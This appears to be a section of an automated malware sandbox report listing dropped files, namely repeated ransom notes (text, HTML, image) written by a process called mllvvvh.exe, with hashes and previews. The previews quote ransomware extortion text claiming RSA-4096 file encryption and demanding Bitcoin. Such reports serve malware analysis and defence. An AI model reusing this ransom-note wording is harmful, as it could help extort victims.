                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64be4\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c651b0\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c651b0\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c651b0\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65588\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65588\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65588\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65b55\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65b55\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65b55\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65f5c\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65f5c\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65f5c\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6835f\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6835f\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6835f\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
